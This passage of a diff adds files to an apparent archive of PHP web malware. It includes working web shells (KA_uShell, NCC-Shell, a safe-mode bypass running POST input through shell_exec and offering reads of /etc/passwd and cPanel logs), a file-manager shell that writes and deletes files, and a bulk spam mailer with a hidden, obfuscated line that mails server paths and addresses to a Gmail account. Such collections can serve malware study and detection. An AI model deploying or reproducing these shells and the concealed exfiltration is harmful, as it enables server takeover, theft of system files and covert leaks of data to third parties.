<td>Ôàéëî:</td>
<td><input size="48" name="file" type="file"></td>
</tr>
<tr>
<td>Ïàïêà:</td>
<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td>
$tend
HTML;
if (isset($_POST['path'])){
$uploadfile = $_POST['path'].$_FILES['file']['name'];
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
echo "Ôàéëî óñïåøíî çàãðóæåí â ïàïêó $uploadfile\n";
echo "Èìÿ:" .$_FILES['file']['name']. "\n";
echo "Ðàçìåð:" .$_FILES['file']['size']. "\n";
} else {
print "Íå óäà¸òñÿ çàãðóçèòü ôàéëî. Èíôà:\n";
print_r($_FILES);
}
}
break;
// Whois
case "whois":
echo <<<HTML
<b>Whois</b>
<table>
<form action="$self" method="POST">
<input type="hidden" name="ac" value="whois">
<tr>
<td>Äîìåí:</td>
<td><input size="40" type="text" name="wq"></td>
</tr>
<tr>
<td>Õóéç ñåðâåð:</td>
<td><input size="40" type="text" name="wser" value="whois.ripe.net"></td>
</tr>
<tr><td>
<input align="right" type="submit" value="Enter">
</td></tr>
$tend
HTML;
if (isset($_POST['wq']) && $_POST['wq']<>"") {
if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser'];
$querty = $_POST['wq']."\r\n";
$fp = fsockopen($wser, 43);
if (!$fp) {echo "Íå ìîãó îòêðûòü ñîêåò";} else {
fputs($fp, $querty);
while(!feof($fp)){echo fgets($fp, 4000);}
fclose($fp);
}}
break;
}
?>
</pre>
</body>
</html>

229
web-malware-collection-13-06-2012/PHP/KAdot Universal Shell v0.1.6.txt Normal file
View file

@ -0,0 +1,229 @@
<!--
/+--------------------------------+\
| KA_uShell |
| <KAdot Universal Shell> |
| Version 0.1.6 |
| 13.03.04 |
| Author: KAdot <KAdot@ngs.ru> |
|--------------------------------|
\+ +/
-->
<html>
<head>
<title>KA_uShell 0.1.6</title>
<style type="text/css">
<!--
body, table{font-family:Verdana; font-size:12px;}
table {background-color:#EAEAEA; border-width:0px;}
b {font-family:Arial; font-size:15px;}
a{text-decoration:none;}
-->
</style>
</head>
<body>
<?php
$self = $_SERVER['PHP_SELF'];
$docr = $_SERVER['DOCUMENT_ROOT'];
$sern = $_SERVER['SERVER_NAME'];
$tend = "</tr></form></table><br><br><br><br>";
// Configuration
$login = "admin";
$pass = "123";
/*/ Authentication
if (!isset($_SERVER['PHP_AUTH_USER'])) {
header('WWW-Authenticate: Basic realm="KA_uShell"');
header('HTTP/1.0 401 Unauthorized');
exit;}
else {
if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login)
{ echo "×òî íàäî?"; exit;}
}
*/
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
else {$ac = "shell";}
// Menu
echo "
|<a href=$self?ac=shell>Shell</a>|
|<a href=$self?ac=upload>File Upload</a>|
|<a href=$self?ac=tools>Tools</a>|
|<a href=$self?ac=eval>PHP Eval Code</a>|
|<a href=$self?ac=whois>Whois</a>|
<br><br><br><pre>";
switch($ac) {
// Shell
case "shell":
echo <<<HTML
<b>Shell</b>
<table>
<form action="$self" method="POST">
<input type="hidden" name="ac" value="shell">
<tr><td>
$$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter">
</td></tr>
<tr><td>
<textarea cols="100" rows="25">
HTML;
if (!empty($_POST['c'])){
passthru($_POST['c']);
}
echo "</textarea></td>$tend";
break;
//PHP Eval Code execution
case "eval":
echo <<<HTML
<b>PHP Eval Code</b>
<table>
<form method="POST" action="$self">
<input type="hidden" name="ac" value="eval">
<tr>
<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
</tr>
<tr>
<td><input type="submit" value="Enter"></td>
$tend
HTML;
if (isset($_POST['ephp'])){
eval($_POST['ephp']);
}
break;
//Text tools
case "tools":
echo <<<HTML
<b>Tools</b>
<table>
<form method="POST" action="$self">
<input type="hidden" name="ac" value="tools">
<tr>
<td>
<input type="radio" name="tac" value="1">B64 Decode<br>
<input type="radio" name="tac" value="2">B64 Encode<br><hr>
<input type="radio" name="tac" value="3">md5 Hash
</td>
<td><textarea name="tot" rows="5" cols="42"></textarea></td>
</tr>
<tr>
<td> </td>
<td><input type="submit" value="Enter"></td>
$tend
HTML;
if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
switch($_POST['tac']) {
case "1":
echo "Ðàñêîäèðîâàííûé òåêñò:<b>" .base64_decode($_POST['tot']). "</b>";
break;
case "2":
echo "Êîäèðîâàííûé òåêñò:<b>" .base64_encode($_POST['tot']). "</b>";
break;
case "3":
echo "Êîäèðîâàííûé òåêñò:<b>" .md5($_POST['tot']). "</b>";
break;
}}
break;
// Uploading
case "upload":
echo <<<HTML
<b>File Upload</b>
<table>
<form enctype="multipart/form-data" action="$self" method="POST">
<input type="hidden" name="ac" value="upload">
<tr>
<td>Ôàéëî:</td>
<td><input size="48" name="file" type="file"></td>
</tr>
<tr>
<td>Ïàïêà:</td>
<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td>
$tend
HTML;
if (isset($_POST['path'])){
$uploadfile = $_POST['path'].$_FILES['file']['name'];
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
echo "Ôàéëî óñïåøíî çàãðóæåí â ïàïêó $uploadfile\n";
echo "Èìÿ:" .$_FILES['file']['name']. "\n";
echo "Ðàçìåð:" .$_FILES['file']['size']. "\n";
} else {
print "Íå óäà¸òñÿ çàãðóçèòü ôàéëî. Èíôà:\n";
print_r($_FILES);
}
}
break;
// Whois
case "whois":
echo <<<HTML
<b>Whois</b>
<table>
<form action="$self" method="POST">
<input type="hidden" name="ac" value="whois">
<tr>
<td>Äîìåí:</td>
<td><input size="40" type="text" name="wq"></td>
</tr>
<tr>
<td>Õóéç ñåðâåð:</td>
<td><input size="40" type="text" name="wser" value="whois.ripe.net"></td>
</tr>
<tr><td>
<input align="right" type="submit" value="Enter">
</td></tr>
$tend
HTML;
if (isset($_POST['wq']) && $_POST['wq']<>"") {
if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser'];
$querty = $_POST['wq']."\r\n";
$fp = fsockopen($wser, 43);
if (!$fp) {echo "Íå ìîãó îòêðûòü ñîêåò";} else {
fputs($fp, $querty);
while(!feof($fp)){echo fgets($fp, 4000);}
fclose($fp);
}}
break;
}
?>
</pre>
</body>
</html>

34
web-malware-collection-13-06-2012/PHP/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php Normal file
View file

@ -0,0 +1,34 @@
<?
echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit</font></b><br>";
print_r('
<pre>
<form method="POST" action="">
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="Çalýþtýr" type="submit">
</form>
<form method="POST" action="">
<b><font color=blue>Hýzlý Menü :=) :</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">Tüm Açýk Portalarý Gör</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="Göster Bakim">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
$liz0=shell_exec($_POST[baba]);
$liz0zim=shell_exec($_POST[liz0]);
$uid=shell_exec('id');
$server=shell_exec('uname -a');
echo "<pre><h4>";
echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>";
echo "<b><font color=red>Server</font></b>:$server<br>";
echo "<b><font color=red>Komut Sonuçlarý:</font></b><br>";
echo $liz0;
echo $liz0zim;
echo "</h4></pre>";
?>

34
web-malware-collection-13-06-2012/PHP/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.txt Normal file
View file

@ -0,0 +1,34 @@
<?
echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit</font></b><br>";
print_r('
<pre>
<form method="POST" action="">
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="Çalýþtýr" type="submit">
</form>
<form method="POST" action="">
<b><font color=blue>Hýzlý Menü :=) :</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">Tüm Açýk Portalarý Gör</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="Göster Bakim">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
$liz0=shell_exec($_POST[baba]);
$liz0zim=shell_exec($_POST[liz0]);
$uid=shell_exec('id');
$server=shell_exec('uname -a');
echo "<pre><h4>";
echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>";
echo "<b><font color=red>Server</font></b>:$server<br>";
echo "<b><font color=red>Komut Sonuçlarý:</font></b><br>";
echo $liz0;
echo $liz0zim;
echo "</h4></pre>";
?>

2026
web-malware-collection-13-06-2012/PHP/Macker's Private PHPShell.php Normal file
View file

File diff suppressed because it is too large Load diff

182
web-malware-collection-13-06-2012/PHP/Moroccan Spamers Ma-EditioN By GhOsT.txt Normal file
View file

@ -0,0 +1,182 @@
<?
if ($action=="send"){
$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?>
<form name="form1" method="post" action="" enctype="multipart/form-data">
<div align="center">
<center>
<table border="2" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#006699" width="74%" id="AutoNumber1">
<tr>
<td width="100%">
<div align="center">
<center>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2">
<tr>
<td width="100%">
<p align="center"><div align="center">
<center>
<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#336699" width="70%" cellpadding="0" id="AutoNumber1" height="277">
<tr>
<td width="100%" height="272">
<table width="769" border="0" height="303">
<tr>
<td width="786" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic3.gif" colspan="3" height="28">
<p align="center"><b><font face="Tahoma" size="2" color="#FF6600"> Moroccan Spamers Ma-EditioN By GhOsT </font></b></td>
</tr>
<tr>
<td width="79" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" align="right">
<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your
Email:</font></div>
</td>
<td width="390" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input name="from" value="<? print $from; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your
Name:</font></div>
</td>
<td width="317" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" valign="middle"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="realname" value="<? print $realname; ?>" size="30">
</font></td>
</tr>
<tr>
<td width="79" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" align="right">
<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font></div>
</td>
<td width="390" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input name="replyto" value="<? print $replyto; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Attach
File:</font></div>
</td>
<td width="317" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input type="file" name="file" size="30">
</font></td>
</tr>
<tr>
<td width="79" background="/simparts/images/cellpic1.gif" height="22" align="right">
<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div>
</td>
<td colspan="2" width="715" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input name="subject" value="<? print $subject; ?>" size="59" style="float: left">
</font></td>
</tr>
<tr valign="top">
<td colspan="2" width="477" bgcolor="#CCCCCC" height="189" valign="top">
<div align="left">
<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="98%" id="AutoNumber4">
<tr>
<td width="100%">
<textarea name="message" cols="56" rows="10"><? print $message; ?></textarea>
<br>
<input type="radio" name="contenttype" value="plain" checked>
<font size="2" face="Tahoma">Plain</font>
<input type="radio" name="contenttype" value="html">
<font size="2" face="Tahoma">HTML</font>
<input type="hidden" name="action" value="send">
<input type="submit" value="Send Message">
</td>
</tr>
</table>
</div>
</td>
<td width="317" bgcolor="#CCCCCC" height="187" valign="top">
<div align="center">
<center>
<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="93%" id="AutoNumber3">
<tr>
<td width="100%">
<p align="center"> <textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea>
</font><br>
</td>
</tr>
</table>
</center>
</div>
</td>
</tr>
</table>
</td>
</tr>
</table>
</center>
</div></td>
</tr>
</table>
</center>
</div>
</td>
</tr>
</table>
</center>
</div>
<div align="center">
<center>
<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="75%" id="AutoNumber5" height="1" cellpadding="0">
<tr>
<td width="100%" valign="top" height="1">
<p align="right"><font size="1" face="Tahoma" color="#CCCCCC">Designed by:
v1.5</font></td>
</tr>
</table>
</center>
</div>
</form>
<?
if ($action=="send"){
if (!$from && !$subject && !$message && !$emaillist){
print "Please complete all fields before sending your message.";
exit;
}
$allemails = split("\n", $emaillist);
$numemails = count($allemails);
#Open the file attachment if any, and base64_encode it for email transport
If ($file_name){
@copy($file, "./$file_name") or die("The file you are trying to upload couldn't be copied to the server");
$content = fread(fopen($file,"r"),filesize($file));
$content = chunk_split(base64_encode($content));
$uid = strtoupper(md5(uniqid(time())));
$name = basename($file);
}
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print "Sending mail to $to....... ";
flush();
$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
$header .= "MIME-Version: 1.0\r\n";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
If ($file_name) $header .= "--$uid\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
If ($file_name) $header .= "--$uid\r\n";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
If ($file_name) $header .= "$content\r\n";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print "Spamed'><br>";
flush();
}
}
}
?>

1302
web-malware-collection-13-06-2012/PHP/MySQL Web Interface Version 0.8.php Normal file
View file

File diff suppressed because it is too large Load diff

1302
web-malware-collection-13-06-2012/PHP/MySQL Web Interface Version 0.8.txt Normal file
View file

File diff suppressed because it is too large Load diff

1166
web-malware-collection-13-06-2012/PHP/Mysql interface v1.0.txt Normal file
View file

File diff suppressed because it is too large Load diff

60
web-malware-collection-13-06-2012/PHP/NCC-Shell.txt Normal file
View file

@ -0,0 +1,60 @@
<center>
<h1>.:NCC:. Shell v1.0.0</h1>
<title>.:NCC:. Shell v1.0.0</title>
<head><h2>Hacked by Silver</h2></head>
<h1>---------------------------------------------------------------------------------------</h1><br>
<b><font color=red>---Server Info---</font></b><br>
<?php
echo "<b><font color=red>Safe Mode on/off: </font></b>";
// Check for safe mode
if( ini_get('safe_mode') ) {
print '<font color=#FF0000><b>Safe Mode ON</b></font>';
} else {
print '<font color=#008000><b>Safe Mode OFF</b></font>';
}
echo "</br>";
echo "<b><font color=red>Momentane Directory: </font></b>"; echo $_SERVER['DOCUMENT_ROOT'];
echo "</br>";
echo "<b><font color=red>Server: </font></b><br>"; echo $_SERVER['SERVER_SIGNATURE'];
echo "<a href='$php_self?p=info'>PHPinfo</a>";
if(@$_GET['p']=="info"){
@phpinfo();
exit;}
?>
<h1>---------------------------------------------------------------------------</h1><br>
<h2>- Upload -</h2>
<title>Upload - Shell/Datei</title>
<form
action="<?php echo $_SERVER['PHP_SELF']; ?>"
method="post"
enctype="multipart/form-data">
<input type="file" name="Upload" />
<input type="submit" value="Upload!" />
</form>
<hr />
<?php
if (isset($_FILES['probe']) and ! $_FILES['probe']['error']) {
// Alternativ: and $_FILES['probe']['size']
move_uploaded_file($_FILES['probe']['tmp_name'], "./dingen.php");
printf("Die Datei %s wurde als dingen.php hochgeladen.<br />\n",
$_FILES['probe']['name']);
printf("Sie ist %u Bytes groß und vom Typ %s.<br />\n",
$_FILES['probe']['size'], $_FILES['probe']['type']);
}
?>
<h1>---------------------------------------------------------------------------</h1><br>
<h2>IpLogger</h2>
<?php
echo "<b><font color=red><br>IP: </font></b>"; echo $_SERVER['REMOTE_ADDR'];
echo "<b><font color=red><br>PORT: </font></b>"; echo $_SERVER['REMOTE_PORT'];
echo "<b><font color=red><br>BROWSER: </font></b>"; echo $_SERVER[HTTP_REFERER];
echo "<b><font color=red><br>REFERER: </font></b>"; echo $_SERVER['HTTP_USER_AGENT'];
?>
<h1>---------------------------------------------------------------------------</h1><br>
<h2>Directory Lister</h2>
<? $cmd = $_REQUEST["-cmd"];?><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value=<?=$cmd?>><hr><pre><?if($cmd != "") print Shell_Exec($cmd);?></pre></form><br>
<h1>---------------------------------------------------------------------------</h1><br>
<b>--Coded by Silver©--<br>
~|_Team .:National Cracker Crew:._|~<br>
<a href="http://www.n-c-c.6x.to" target="_blank">-->NCC<--</a></center></b></html>

1480
web-malware-collection-13-06-2012/PHP/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php Normal file
View file

File diff suppressed because it is too large Load diff

1480
web-malware-collection-13-06-2012/PHP/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.txt Normal file
View file

File diff suppressed because it is too large Load diff

5603
web-malware-collection-13-06-2012/PHP/NetworkFileManagerPHP.txt Normal file
View file

File diff suppressed because it is too large Load diff

597
web-malware-collection-13-06-2012/PHP/PH Vayv.txt Normal file
View file

@ -0,0 +1,597 @@
<? if($sistembilgisi > "") {phpinfo();} else { ?>
<?$fistik=PHVayv;?>
<?if ($sildos>"") {unlink("$dizin/$sildos");} ?>
<?if ($dizin== ""){$dizin=realpath('.');}{$dizin=realpath($dizin);}?>
<?if ($silklas > ""){rmdir($silklas);}?>
<?if ($yeniklasor > "") {mkdir("$dizin/$duzenx2",777);}?>
<?if ($yenidosya == "1") {
$baglan=fopen("$dizin/$duzenx2",'w');
fwrite($baglan,$duzenx);
fclose($baglan);}
?>
<?if ($duzkaydet > "") {
$baglan=fopen($duzkaydet,'w');
fwrite($baglan,$duzenx);
fclose($baglan);}
?>
<?if ($yenklas>"") {;?>
<body topmargin="0" leftmargin="0">
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
<tr>
<td width="70" bgcolor="#000000" height="76">
<p align="center">
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
<td width="501" bgcolor="#000000" height="76" valign="top">
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
<span style="font-weight: 700">
<br>
AventGrup©<br>
</span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
<span style="font-weight: 700">
<br>
PHVayv 1.0</span></font></td>
<td width="431" bgcolor="#000000" height="76" valign="top">
<p align="right"><span style="font-weight: 700">
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
<a href="http://www.aventgrup.net" style="text-decoration: none">
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
<tr>
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
<span style="font-size: 8pt">&nbsp;Çalýþýlan </span></font>
<font face="Verdana" style="font-size: 8pt">Dizin</font></td>
<td bgcolor="#D6D6D6" height="20">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
<tr>
<td width="1"></td>
<td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
<td width="65">
&nbsp;</td>
</tr>
</table>
</td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber30" height="184">
<tr>
<td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
</tr>
<tr>
<td width="100%" bgcolor="#9F9F9F" align="center" height="144">
<form method="POST" action="<?echo "$fistik.php?yeniklasor=1&dizin=$dizin"?>"
<p align="center"><br>
<font
color="#FFFFFF" size="1" face="Arial">
<input
type="text" size="37" maxlength="32"
name="duzenx2" value="Klasör Adý"
class="search"
onblur="if (this.value == '') this.value = 'Kullanýcý'"
onfocus="if (this.value == 'Kullanýcý') this.value=''"
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
<p align="center">
<span class="gensmall">
<input type="submit" size="16"
name="duzenx1" value="Kaydet"
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
</span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
&nbsp;</font></b></p>
</form>
</td>
</tr>
<tr>
<td width="100%" bgcolor="#000000" align="center" height="19">
&nbsp;</td>
</tr>
</table>
<? } else { ?>
<?if ($yendos>"") {;
?>
<body topmargin="0" leftmargin="0">
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
<tr>
<td width="70" bgcolor="#000000" height="76">
<p align="center">
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
<td width="501" bgcolor="#000000" height="76" valign="top">
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
<span style="font-weight: 700">
<br>
AventGrup©<br>
</span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
<span style="font-weight: 700">
<br>
PHVayv 1.0</span></font></td>
<td width="431" bgcolor="#000000" height="76" valign="top">
<p align="right"><span style="font-weight: 700">
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
<a href="http://www.aventgrup.net" style="text-decoration: none">
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
<tr>
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
<span style="font-size: 8pt">&nbsp;Çalýþýlan </span></font>
<font face="Verdana" style="font-size: 8pt">Dizin</font></td>
<td bgcolor="#D6D6D6" height="20">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
<tr>
<td width="1"></td>
<td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
<td width="65">
&nbsp;</td>
</tr>
</table>
</td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="495">
<tr>
<td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
</tr>
<tr>
<td width="100%" bgcolor="#9F9F9F" align="center" height="455">
<form method="POST" action="<?echo "$fistik.php?yenidosya=1&dizin=$dizin"?>"
<p align="center"><br>
<font
color="#FFFFFF" size="1" face="Arial">
<input
type="text" size="50" maxlength="32"
name="duzenx2" value="Dosya Adý"
class="search"
onblur="if (this.value == '') this.value = 'Kullanýcý'"
onfocus="if (this.value == 'Kullanýcý') this.value=''"
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red">
<textarea name="duzenx"
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-CENTER: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
rows="24" cols="122" wrap="OFF">XXXX</textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
<br>
</font></b>
<span class="gensmall">
<input type="submit" size="16"
name="duzenx1" value="Kaydet"
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
</span><br>
&nbsp;</p>
</form>
</td>
</tr>
<tr>
<td width="100%" bgcolor="#000000" align="center" height="19">
&nbsp;</td>
</tr>
</table>
<? } else { ?>
<?if ($duzenle>"") {;
?>
<body topmargin="0" leftmargin="0">
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
<tr>
<td width="70" bgcolor="#000000" height="76">
<p align="center">
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
<td width="501" bgcolor="#000000" height="76" valign="top">
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
<span style="font-weight: 700">
<br>
AventGrup©<br>
</span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
<span style="font-weight: 700">
<br>
PHVayv 1.0</span></font></td>
<td width="431" bgcolor="#000000" height="76" valign="top">
<p align="right"><span style="font-weight: 700">
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
<a href="http://www.aventgrup.net" style="text-decoration: none">
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
